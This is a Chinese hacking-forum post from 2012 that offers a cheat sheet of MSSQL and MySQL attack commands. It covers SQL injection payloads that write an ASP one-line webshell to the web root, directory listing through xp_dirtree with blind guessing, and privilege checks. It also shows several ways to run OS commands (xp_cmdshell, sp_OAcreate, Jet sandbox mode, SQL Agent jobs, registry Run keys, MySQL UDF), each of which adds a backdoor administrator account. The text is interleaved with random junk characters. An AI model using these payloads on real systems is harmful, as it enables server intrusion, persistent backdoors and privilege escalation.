找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3053|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
1 F# Q+ m& o' _! \1 H& ]首先确定网站的WEB路径
( y$ E" J6 g# Y9 _; j& w' A/ O;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马1 ~2 s- K. I/ m+ g' S$ \; i4 k/ l
0 `9 E; f$ b; x# L
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- # s' m0 Y0 I5 |" X, u% w/ W
//将一句话木马插入表中4 i/ H8 U9 ?+ t) t- |4 d
% C5 ~' o7 h0 t+ ^0 w. X
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
+ W- h/ z  T8 {. @. E* P4 i& Z//导出一个ASP文件
, T- o% X" M" `1 U6 C% w: T" ^- D; d' R) T" d
4 t8 K  @; H7 F- g/ Y/ d/ s
关于MSSQL列目录
4 z6 h1 R' v; u, _8 b& m& N;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表( i5 P2 y: a4 k
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表6 M9 r6 m: F  e

% w# v' q( b; a/ Pand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录% i, o0 q/ R1 N! R2 T5 J

2 I$ v) e7 v3 l9 |: M+ c' O' C* dAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
- S. H5 F5 b" C4 @6 w8 U" ?, c
4 o- g. a" H" _8 H+ ?# MAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
/ z0 X2 c' Y6 S" ~
% y; H5 X+ ~. y: l$ u7 H9 K: d: U* e0 p1 G& ?
数据库版本和权限查看! b) i# D# M% F
and 1=(select @@VERSION) //查看详细的数据库信息.# f6 C; a' @7 Z0 O# y4 T
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
# i; @% i5 F$ Pand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
: Q. q  M) B8 X6 ]! c; p  F2 K9 X; J5 h# C/ b) B- U0 i# a1 {

6 t8 f6 Z4 H* o) m; k. L1.利用xp_cmdshell执行命令
8 ?& H9 ?7 E# X* Lexec master..xp_cmdshell 'net user rfire 123456 /add'9 U- N) `" d- e
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
& J/ o. V( Y5 G3 ]  T6 c0 }
9 U3 j  B( `& M  o; r) f5 p恢复xp_cmdshell存储过程
  X" u: @/ V8 J1 \6 c: E- t9 X" CExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
  V) m! E8 K. z; ^4 C# a: `& Q& c
- Z9 F5 `/ K0 j, L* w4 t6 D$ Y; G: [
2.利用SP_OAcreate和SP_OAMETHOD执行命令
; v8 j# C7 P4 u: R在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下% F: \+ F# E3 i' k; K7 L( K8 U
DECLARE @shell INT //建立一个@shell实体2 U$ b3 c7 [  O' }  R, |5 A8 y9 R1 N
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
  r/ V3 i/ F* kEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例! o* v  ?4 ^. A3 ?8 f& T7 F
# {) {- e3 I1 {' x$ U) k3 D

' d/ N. R4 Q' g8 @6 E# F9 W. N3.利用沙盒模式( G0 U3 t  w# w0 h& ~  X/ n# U
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
9 ^6 |" K6 x% t: b2 H, Q- `开启沙盒模式:% p* R1 j$ {; S: Q  o8 i/ Y1 \
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
5 [8 H; v, ^( ]% T1 I' D
+ i$ W6 {9 N$ D执行命令:) ^" f) ?+ H1 u5 y8 q
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');4 N0 e$ w' x6 \) f6 T+ ^
8 ?6 ]4 G; t0 {6 _% K
4 S- E( E; B5 R' O6 {
4.利用SQL代理执行命令$ k' Q7 B; t6 s
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
$ r- `5 w" J9 F# m: U) U: ^9 \( {; T3 ^" _1 Y0 c1 M) |/ W
执行命令:
5 e& U$ w3 z' X( h" Q- P. n0 buse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错# L7 m0 g1 a8 Z/ N+ J/ g" z' ?
exec sp_add_job 'x'1 W) f* y! T; `# C9 W
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业; s& S# s6 V3 t0 a* h  B
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业1 o7 M4 q' Q0 M+ F- l, s4 j: Y- {
" E* \5 ?: }1 C5 I" I5 B' X) b+ a' y
( S! Y! o/ l' w9 Y8 Y* H
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)7 Z2 `8 S2 F. P& J% l3 Q, }
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'8 V' ?$ V7 w: m

$ W3 H! {- i$ e1 I* v5 C7 d- f0 ^8 G
6.MYSQL的命令执行  @8 `) e0 H6 r- C
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
8 e- N7 B- T( q首先要在su.php下导出c:\windows\udf.dll
: e8 o% T+ u- R导出后执行创建自定义函数命令:
7 ^. l5 h, A  B. N( KCreate Function cmdshell returns string soname 'udf.dll'
2 N+ G3 s6 [& ]( g0 e: n! @执行命令
# H# O5 u4 e, Q+ zselect cmdshell('net user rfire 123456 /add')0 T% L6 h+ z$ ]! e9 d% k
执行后删除函数 drop function cmdshell
$ {5 i  B: x$ R1 T. A) Z; X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表